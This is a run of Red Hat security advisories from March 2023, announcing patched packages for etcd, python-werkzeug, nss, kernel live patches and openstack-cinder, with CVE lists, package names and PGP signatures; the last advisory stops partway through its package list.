-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenStack Platform (etcd) security update  
Advisory ID:       RHSA-2023:1275-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1275  
Issue date:        2023-03-15  
CVE Names:         CVE-2022-1705 CVE-2022-2880 CVE-2022-3064   
                   CVE-2022-27664 CVE-2022-30629 CVE-2022-30630   
                   CVE-2022-30632 CVE-2022-30635 CVE-2022-32148   
                   CVE-2022-32189 CVE-2022-41715 CVE-2022-41717   
=====================================================================

1. Summary:

An update for etcd is now available for Red Hat OpenStack Platform.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenStack Platform 16.1 - ppc64le, x86_64  
Red Hat OpenStack Platform 16.2 - ppc64le, x86_64

3. Description:

etcd is a highly-available key value store for shared configuration.

The following Important impact security fix(es) are applicable to Red Hat  
OpenStack Platform 17.0 (Wallaby), 16.2 (Train), and 16.1 (Train):

* Improve heuristics preventing CPU/memory abuse by parsing malicious or  
large YAML documents (CVE-2022-3064)

As a result of being built by golang 1.18.9, the following Moderate impact  
security fix(es) are applicable to Red Hat OpenStack Platform 16.2 and  
16.1:

* golang: net/http: improper sanitization of Transfer-Encoding header  
(CVE-2022-1705)  
* golang: net/http/httputil: ReverseProxy should not forward unparseable  
query parameters (CVE-2022-2880)  
* golang: net/http: handle server errors after sending GOAWAY  
(CVE-2022-27664)  
* golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)  
* golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)  
* golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)  
* golang: net/http/httputil: NewSingleHostReverseProxy - omit  
X-Forwarded-For not working (CVE-2022-32148)  
* golang: regexp/syntax: limit memory used by parsing regexps  
(CVE-2022-41715)  
* golang: net/http: An attacker can cause excessive memory growth in a Go  
server accepting HTTP/2 requests (CVE-2022-41717)

As a result of being built by golang 1.18.9, the following Low impact  
security fix(es) are applicable to Red Hat OpenStack Platform 16.2 and  
16.1:

* golang: crypto/tls: session tickets lack random ticket_age_add  
(CVE-2022-30629)  
* golang: math/big: decoding big.Float and big.Rat types can panic if the  
encoded message is too short, potentially allowing a denial of service  
(CVE-2022-32189)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page listed in the References section.

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add  
2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob  
2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header  
2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working  
2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob  
2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode  
2113814 - CVE-2022-32189 golang: math/big: decoding big.Float and big.Rat types can panic if the encoded message is too short, potentially allowing a denial of service  
2124669 - CVE-2022-27664 golang: net/http: handle server errors after sending GOAWAY  
2132868 - CVE-2022-2880 golang: net/http/httputil: ReverseProxy should not forward unparseable query parameters  
2132872 - CVE-2022-41715 golang: regexp/syntax: limit memory used by parsing regexps  
2161274 - CVE-2022-41717 golang: net/http: An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests  
2163037 - CVE-2022-3064 go-yaml: Improve heuristics preventing CPU/memory abuse by parsing malicious or large YAML documents

6. Package List:

Red Hat OpenStack Platform 16.1:

Source:  
etcd-3.3.23-12.el8ost.src.rpm

ppc64le:  
etcd-3.3.23-12.el8ost.ppc64le.rpm  
etcd-debuginfo-3.3.23-12.el8ost.ppc64le.rpm  
etcd-debugsource-3.3.23-12.el8ost.ppc64le.rpm

x86_64:  
etcd-3.3.23-12.el8ost.x86_64.rpm  
etcd-debuginfo-3.3.23-12.el8ost.x86_64.rpm  
etcd-debugsource-3.3.23-12.el8ost.x86_64.rpm

Red Hat OpenStack Platform 16.2:

Source:  
etcd-3.3.23-12.el8ost.src.rpm

ppc64le:  
etcd-3.3.23-12.el8ost.ppc64le.rpm  
etcd-debuginfo-3.3.23-12.el8ost.ppc64le.rpm  
etcd-debugsource-3.3.23-12.el8ost.ppc64le.rpm

x86_64:  
etcd-3.3.23-12.el8ost.x86_64.rpm  
etcd-debuginfo-3.3.23-12.el8ost.x86_64.rpm  
etcd-debugsource-3.3.23-12.el8ost.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1705  
https://access.redhat.com/security/cve/CVE-2022-2880  
https://access.redhat.com/security/cve/CVE-2022-3064  
https://access.redhat.com/security/cve/CVE-2022-27664  
https://access.redhat.com/security/cve/CVE-2022-30629  
https://access.redhat.com/security/cve/CVE-2022-30630  
https://access.redhat.com/security/cve/CVE-2022-30632  
https://access.redhat.com/security/cve/CVE-2022-30635  
https://access.redhat.com/security/cve/CVE-2022-32148  
https://access.redhat.com/security/cve/CVE-2022-32189  
https://access.redhat.com/security/cve/CVE-2022-41715  
https://access.redhat.com/security/cve/CVE-2022-41717  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBI1RdzjgjWX9erEAQhiMQ//RoGIYCEpQVateDyWCzgK994AwibDtJsY  
oItePquSjOfG7TpqVfJz7W2Ss9LRpvH2/LtYx+7U1YRDWBfDp5QaU3Lkam+uy1dy  
DKNtkOcWOFZm48f3w6BJkeRmQgahkTZCa+b/Em7+MgCR+Aw2R0ish30j9UOac/8v  
aOZ66hulCl6dw2WmKBYFxtK6KI8/MW7N9bNM13Jmhi+EsHNMC5r5rvGz5hQIKDxp  
i0ax5bRWcVGyET4RYbEMxhVvOJzwdHLNEA4MnzWvylKU017V69EnMPdHZC0ByU8Q  
4rxwAKmA5TKxe5u1Dj8pwWIoY0XWIQ92o5JhGyclA+f02E1OSqpcT/Jx61oUtUJ4  
SyQioPflFQS96no+JW33/Pb7HHB/CtQA/W7HgiC5le4FjrB9/UPuleqf7asxe8Up  
HwuGD8twgr9K98Ek/+F/90l0AkuhwL6NrXd4Un/o/yfrmzMGGgfCFLW4uCOpNYtS  
+RgPKWOhrM0V8YGchKwRgedRooecPGwzx2nDYtLp08t/iNCcDIaoA9lYk6jmmYDN  
fs+YWixNNMuDpHGYhwkanFlQ3DTC6AGgXkXVfErBLAewq/ffAyuBi321kxj1YI8e  
D3auvxSY3hzmwtjUExAo2gyIBl6tIilOaJpP/OmekpPza1W8yzqglhoThU8eF/F+  
HhBZ5kVrN8E=  
=O/n4  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1275-01

Red Hat Security Advisory 2023-1281-01 - An update for python-werkzeug is now available for Red Hat OpenStack Platform. Issues addressed include a remote shell upload vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat OpenStack Platform (python-werkzeug) security update  
Advisory ID:       RHSA-2023:1281-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1281  
Issue date:        2023-03-15  
CVE Names:         CVE-2023-25577   
=====================================================================

1. Summary:

An update for python-werkzeug is now available for Red Hat OpenStack  
Platform.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenStack Platform 13.0 - ELS - noarch  
Red Hat OpenStack Platform 16.1 - noarch  
Red Hat OpenStack Platform 16.2 - noarch

3. Description:

Werkzeug started as simple collection of various  
utilities for WSGI applications and has become one of the most advanced  
WSGI utility modules. It includes a powerful debugger, full featured  
request and response objects, HTTP utilities to handle entity tags, cache  
control headers, HTTP dates, cookie handling, file uploads, a powerful URL  
routing system and a bunch of community contributed addon modules. Werkzeug  
is unicode aware and doesn't enforce a specific template engine, database  
adapter or anything else. It doesn't even enforce a specific way of  
handling requests and leaves all that up to the developer. It's most useful  
for end user applications which should work on as many server environments  
as possible (such as blogs, wikis, bulletin boards, etc.).

Security Fix(es):

* high resource usage when parsing multipart form data with many fields  
(CVE-2023-25577)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2170242 - CVE-2023-25577 python-werkzeug: high resource usage when parsing multipart form data with many fields

6. Package List:

Red Hat OpenStack Platform 13.0 - ELS:

Source:  
python-werkzeug-0.14.1-3.1.el7ost.src.rpm

noarch:  
python2-werkzeug-0.14.1-3.1.el7ost.noarch.rpm  
python2-werkzeug-doc-0.14.1-3.1.el7ost.noarch.rpm

Red Hat OpenStack Platform 16.1:

Source:  
python-werkzeug-0.14.1-12.el8ost.src.rpm

noarch:  
python3-werkzeug-0.14.1-12.el8ost.noarch.rpm

Red Hat OpenStack Platform 16.2:

Source:  
python-werkzeug-0.14.1-12.el8ost.src.rpm

noarch:  
python3-werkzeug-0.14.1-12.el8ost.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-25577  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBI1RNzjgjWX9erEAQhLXw/+MQcQuYA0x8PpAFZEYPAiR2eNanNh+p8H  
YDcu0RNAcz0XkcBYegR3K0Lqbt2a8F/+orH4lQ5Bx6jmaFEchPgo7jTc13XnI+FW  
4IMrRiYoW8I/OyOfBgn617Q4qhqi3K3VxvQIfzxif9b1wQJUztIvzWJcEpZ7hVZp  
Gm/6fSq2ibi1nUoIHZtPxlCsShlcK5nMzM4Y0Z54dDC8i3W7vu5C7o+qOj4aGF9t  
LhZjUQt/4I3ga1wITO22t3aDBiI3YENng5FUO72gpAYXGiMjjahe3CYaMkBLEGaD  
8mwZAtndqRK5jpHnrA9r0zCGLLZNgHN/1P09iIgjyOvZwxihpBKXzPBGaREZ9ZmP  
PKyq5v/7rr2fEcqGR+QwePAaIff3RD5x8kk+opohsCT6iNTqkU2bUlqAu3fG6w8y  
d/qJk0MoU3+/JS5gH/ra+PVxDVj3FleSxYhlFqhRBi1EXMWlkrq67piHcjRfhYa7  
pFhjaAflormx0KV4xxpN3r5l0exfdqNbpByhN6A76BEFUHIjRywUc1vtSvHNuYAh  
nF/Y8RHTfk/A2Ik/U0XD0h1p3c10W7Nb6cBi89XSSWzoYeI7HDUa2UHhtVJGmsoW  
0M5xyq3d7FsO4wX3P4AfpnaWVa+UTxURjUI5JKpV2rj2MJuUwXAjdNazipt1cTNN  
u3V3o4Cxz1I=  
=Oici  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1281-01

Red Hat Security Advisory 2023-1252-01 - Network Security Services is a set of libraries designed to support the cross-platform development of security-enabled client and server applications.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: nss security update  
Advisory ID:       RHSA-2023:1252-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1252  
Issue date:        2023-03-15  
CVE Names:         CVE-2023-0767   
=====================================================================

1. Summary:

An update for nss is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

Network Security Services (NSS) is a set of libraries designed to support  
the cross-platform development of security-enabled client and server  
applications.

Security Fix(es):

* nss: Arbitrary memory write via PKCS 12 (CVE-2023-0767)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing this update, applications using NSS (for example, Firefox)  
must be restarted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2170377 - CVE-2023-0767 nss: Arbitrary memory write via PKCS 12

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
nss-3.79.0-11.el8_7.src.rpm

aarch64:  
nss-3.79.0-11.el8_7.aarch64.rpm  
nss-debuginfo-3.79.0-11.el8_7.aarch64.rpm  
nss-debugsource-3.79.0-11.el8_7.aarch64.rpm  
nss-devel-3.79.0-11.el8_7.aarch64.rpm  
nss-softokn-3.79.0-11.el8_7.aarch64.rpm  
nss-softokn-debuginfo-3.79.0-11.el8_7.aarch64.rpm  
nss-softokn-devel-3.79.0-11.el8_7.aarch64.rpm  
nss-softokn-freebl-3.79.0-11.el8_7.aarch64.rpm  
nss-softokn-freebl-debuginfo-3.79.0-11.el8_7.aarch64.rpm  
nss-softokn-freebl-devel-3.79.0-11.el8_7.aarch64.rpm  
nss-sysinit-3.79.0-11.el8_7.aarch64.rpm  
nss-sysinit-debuginfo-3.79.0-11.el8_7.aarch64.rpm  
nss-tools-3.79.0-11.el8_7.aarch64.rpm  
nss-tools-debuginfo-3.79.0-11.el8_7.aarch64.rpm  
nss-util-3.79.0-11.el8_7.aarch64.rpm  
nss-util-debuginfo-3.79.0-11.el8_7.aarch64.rpm  
nss-util-devel-3.79.0-11.el8_7.aarch64.rpm

ppc64le:  
nss-3.79.0-11.el8_7.ppc64le.rpm  
nss-debuginfo-3.79.0-11.el8_7.ppc64le.rpm  
nss-debugsource-3.79.0-11.el8_7.ppc64le.rpm  
nss-devel-3.79.0-11.el8_7.ppc64le.rpm  
nss-softokn-3.79.0-11.el8_7.ppc64le.rpm  
nss-softokn-debuginfo-3.79.0-11.el8_7.ppc64le.rpm  
nss-softokn-devel-3.79.0-11.el8_7.ppc64le.rpm  
nss-softokn-freebl-3.79.0-11.el8_7.ppc64le.rpm  
nss-softokn-freebl-debuginfo-3.79.0-11.el8_7.ppc64le.rpm  
nss-softokn-freebl-devel-3.79.0-11.el8_7.ppc64le.rpm  
nss-sysinit-3.79.0-11.el8_7.ppc64le.rpm  
nss-sysinit-debuginfo-3.79.0-11.el8_7.ppc64le.rpm  
nss-tools-3.79.0-11.el8_7.ppc64le.rpm  
nss-tools-debuginfo-3.79.0-11.el8_7.ppc64le.rpm  
nss-util-3.79.0-11.el8_7.ppc64le.rpm  
nss-util-debuginfo-3.79.0-11.el8_7.ppc64le.rpm  
nss-util-devel-3.79.0-11.el8_7.ppc64le.rpm

s390x:  
nss-3.79.0-11.el8_7.s390x.rpm  
nss-debuginfo-3.79.0-11.el8_7.s390x.rpm  
nss-debugsource-3.79.0-11.el8_7.s390x.rpm  
nss-devel-3.79.0-11.el8_7.s390x.rpm  
nss-softokn-3.79.0-11.el8_7.s390x.rpm  
nss-softokn-debuginfo-3.79.0-11.el8_7.s390x.rpm  
nss-softokn-devel-3.79.0-11.el8_7.s390x.rpm  
nss-softokn-freebl-3.79.0-11.el8_7.s390x.rpm  
nss-softokn-freebl-debuginfo-3.79.0-11.el8_7.s390x.rpm  
nss-softokn-freebl-devel-3.79.0-11.el8_7.s390x.rpm  
nss-sysinit-3.79.0-11.el8_7.s390x.rpm  
nss-sysinit-debuginfo-3.79.0-11.el8_7.s390x.rpm  
nss-tools-3.79.0-11.el8_7.s390x.rpm  
nss-tools-debuginfo-3.79.0-11.el8_7.s390x.rpm  
nss-util-3.79.0-11.el8_7.s390x.rpm  
nss-util-debuginfo-3.79.0-11.el8_7.s390x.rpm  
nss-util-devel-3.79.0-11.el8_7.s390x.rpm

x86_64:  
nss-3.79.0-11.el8_7.i686.rpm  
nss-3.79.0-11.el8_7.x86_64.rpm  
nss-debuginfo-3.79.0-11.el8_7.i686.rpm  
nss-debuginfo-3.79.0-11.el8_7.x86_64.rpm  
nss-debugsource-3.79.0-11.el8_7.i686.rpm  
nss-debugsource-3.79.0-11.el8_7.x86_64.rpm  
nss-devel-3.79.0-11.el8_7.i686.rpm  
nss-devel-3.79.0-11.el8_7.x86_64.rpm  
nss-softokn-3.79.0-11.el8_7.i686.rpm  
nss-softokn-3.79.0-11.el8_7.x86_64.rpm  
nss-softokn-debuginfo-3.79.0-11.el8_7.i686.rpm  
nss-softokn-debuginfo-3.79.0-11.el8_7.x86_64.rpm  
nss-softokn-devel-3.79.0-11.el8_7.i686.rpm  
nss-softokn-devel-3.79.0-11.el8_7.x86_64.rpm  
nss-softokn-freebl-3.79.0-11.el8_7.i686.rpm  
nss-softokn-freebl-3.79.0-11.el8_7.x86_64.rpm  
nss-softokn-freebl-debuginfo-3.79.0-11.el8_7.i686.rpm  
nss-softokn-freebl-debuginfo-3.79.0-11.el8_7.x86_64.rpm  
nss-softokn-freebl-devel-3.79.0-11.el8_7.i686.rpm  
nss-softokn-freebl-devel-3.79.0-11.el8_7.x86_64.rpm  
nss-sysinit-3.79.0-11.el8_7.x86_64.rpm  
nss-sysinit-debuginfo-3.79.0-11.el8_7.i686.rpm  
nss-sysinit-debuginfo-3.79.0-11.el8_7.x86_64.rpm  
nss-tools-3.79.0-11.el8_7.x86_64.rpm  
nss-tools-debuginfo-3.79.0-11.el8_7.i686.rpm  
nss-tools-debuginfo-3.79.0-11.el8_7.x86_64.rpm  
nss-util-3.79.0-11.el8_7.i686.rpm  
nss-util-3.79.0-11.el8_7.x86_64.rpm  
nss-util-debuginfo-3.79.0-11.el8_7.i686.rpm  
nss-util-debuginfo-3.79.0-11.el8_7.x86_64.rpm  
nss-util-devel-3.79.0-11.el8_7.i686.rpm  
nss-util-devel-3.79.0-11.el8_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0767  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBHhStzjgjWX9erEAQix/g//T6v7Afnkl0G8/JDnP9iZfLpd9VIaWBLo  
en17AtFAGF292qZp85Wfd+t0dB9KBTEJ/6CrPcsM/E5RrYJROSIxTHJnrZOPaU3/  
tre4K6oBaW2Ue4TdRmD2s9W5rxs690/hIChQW/8ibPeuYAejJENLgrnMgubELjif  
Vcuo/oksIrw3tGwwW3TFE1xhq29idu6tLjZOiKfznLOgoP9kaTR5XtDun05/G3oV  
zUYiBe+gbFpby/aP54f44YXku0GdQgGIu1FfKJfe013ElqtUoIC0AreFcTNF1B+5  
adgTGkMjikgvxCUwW/6eAhKTJsAOYnJGKl+KD8PFlrcSS+kw2AImKsmeWuAqkcu9  
s2gycbvl14AhAPOGZ3uoQiyCS0Q3AbxFlzrAQYBmMSTdI9admI0PRmMbNUPdBwMN  
+CblPKk+y959VWLzNi6osN9BEGmkf7czB4AcOWKzsblKkcV/pxlnJlHZ/VZRLnQX  
IXBkDTIQfbRn2hXURcQQ97LxvVeQ64tlinkfmiWKGGybXqJXU5TA1Hg3mqdqgQJY  
X63G8FC5NGMpVhx6iMknoJGZzanb8vUWK9f3ObGMx4+btUZ5x0Fi5xWXEqaER0JU  
7uDe3aElCKNzUPR6kQrgUOz9Tg9NzotpomAdv2QZhin8gDQTbUTlT9g2qOgipjT4  
JoGx1vgVdbg=  
=3iyO  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1252-01

Red Hat Security Advisory 2023-1251-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:1251-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1251  
Issue date:        2023-03-15  
CVE Names:         CVE-2022-3564 CVE-2022-4378   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
8.4 Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS EUS (v.8.4) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: use-after-free caused by l2cap_reassemble_sdu() in  
net/bluetooth/l2cap_core.c (CVE-2022-3564)

* kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
(CVE-2022-4378)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2150999 - CVE-2022-3564 kernel: use-after-free caused by l2cap_reassemble_sdu() in net/bluetooth/l2cap_core.c  
2152548 - CVE-2022-4378 kernel: stack overflow in do_proc_dointvec and proc_skip_spaces

6. Package List:

Red Hat Enterprise Linux BaseOS EUS (v.8.4):

Source:  
kpatch-patch-4_18_0-305_62_1-1-5.el8_4.src.rpm  
kpatch-patch-4_18_0-305_65_1-1-4.el8_4.src.rpm  
kpatch-patch-4_18_0-305_71_1-1-3.el8_4.src.rpm  
kpatch-patch-4_18_0-305_72_1-1-2.el8_4.src.rpm  
kpatch-patch-4_18_0-305_76_1-1-1.el8_4.src.rpm

ppc64le:  
kpatch-patch-4_18_0-305_62_1-1-5.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_62_1-debuginfo-1-5.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_62_1-debugsource-1-5.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_65_1-1-4.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_65_1-debuginfo-1-4.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_65_1-debugsource-1-4.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_71_1-1-3.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_71_1-debuginfo-1-3.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_71_1-debugsource-1-3.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_72_1-1-2.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_72_1-debuginfo-1-2.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_72_1-debugsource-1-2.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_76_1-1-1.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_76_1-debuginfo-1-1.el8_4.ppc64le.rpm  
kpatch-patch-4_18_0-305_76_1-debugsource-1-1.el8_4.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-305_62_1-1-5.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_62_1-debuginfo-1-5.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_62_1-debugsource-1-5.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_65_1-1-4.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_65_1-debuginfo-1-4.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_65_1-debugsource-1-4.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_71_1-1-3.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_71_1-debuginfo-1-3.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_71_1-debugsource-1-3.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_72_1-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_72_1-debuginfo-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_72_1-debugsource-1-2.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_76_1-1-1.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_76_1-debuginfo-1-1.el8_4.x86_64.rpm  
kpatch-patch-4_18_0-305_76_1-debugsource-1-1.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3564  
https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBHhStzjgjWX9erEAQgi5g/+N0P05Ekx1GQBK8WeDoFX37Fj09fnQSXl  
xdun7z13miqC+CeUwwfXiJQecyaCtqN+EyM1s2qk+0G5O5Hzf/geCIqFEgKXQkfQ  
f8OhCK2qLuzSzIorY/LBuvce3wRZQtiKHyhxDiQSbBTBI61tXngVJZeF3uqkoXta  
Eb8S7+SF77p0ITK1u3vaRnzgtRYIYPxBTcGSMPPSlhI+VqSEwpQDagAe8KH26gwT  
rwzERjRddYQsVZcjoq8IBP5QWJpy///89J1cnEac3CVyogihkuNz7SI1kAepRd+0  
oYnbQNKFSIk2bmvuZ/DnUxDvMXawCqTmODWaXggCMTAjUDRi28A29MAtj5Ve7wLW  
0UU+ALtlGK94JsY+znBO27dTIHFpKcET0oc7B4ZWZ/Uu7hiMukWl2gA3ckdV6yVy  
t44zUIc5llKK+PXUtQ8vUiF4jcbtWref37A5nBLJoOHkZzJeRZo1ult5iBgNc4dr  
0cXW4iTfZr8DhDSTE9jZ+UoQ8oLHxJ7cfBRN6HsjzFgko3perH42i7lzllsS+Vje  
+MoULD5iVYQa54sqbwHuqHV/aIVL0LRQQb/pAS6xh6M6hm6Js/16v+/vDsrrtVrf  
mlsUUDHXethzCPHKhq3sVCWYwXGXR3uZ+lnyPZu1DAZurfN8PDnvb3Fvc2SiTNtx  
QO2iVRVT91I=  
=MF+e  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1251-01

Red Hat Security Advisory 2023-1279-01 - Cinder is the replacement of nova-volume in Folsom and beyond, used for block storage.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Synopsis: Red Hat OpenStack Platform (openstack-cinder) security update  
Advisory ID:       RHSA-2023:1279-01  
Product:           Red Hat OpenStack Platform  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1279  
Issue date:        2023-03-15  
CVE Names:         CVE-2022-47951   
=====================================================================

1. Summary:

An update for openstack-cinder is now available for Red Hat OpenStack  
Platform.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenStack Platform 13.0 - ELS - noarch  
Red Hat OpenStack Platform 13.0 for RHEL 7.6 EUS Server - noarch  
Red Hat OpenStack Platform 16.1 - noarch  
Red Hat OpenStack Platform 16.2 - noarch

3. Description:

Cinder is the replacement of nova-volume in Folsom and beyond, used for  
block storage.

Security Fix(es):

* Arbitrary file access through custom VMDK flat descriptor  
(CVE-2022-47951)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page listed in the References section.

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2161812 - CVE-2022-47951 openstack: Arbitrary file access through custom VMDK flat descriptor

6. Package List:

Red Hat OpenStack Platform 13.0 for RHEL 7.6 EUS Server:

Source:  
openstack-cinder-12.0.10-27.el7ost.src.rpm

noarch:  
openstack-cinder-12.0.10-27.el7ost.noarch.rpm  
python-cinder-12.0.10-27.el7ost.noarch.rpm

Red Hat OpenStack Platform 13.0 - ELS:

Source:  
openstack-cinder-12.0.10-27.el7ost.src.rpm

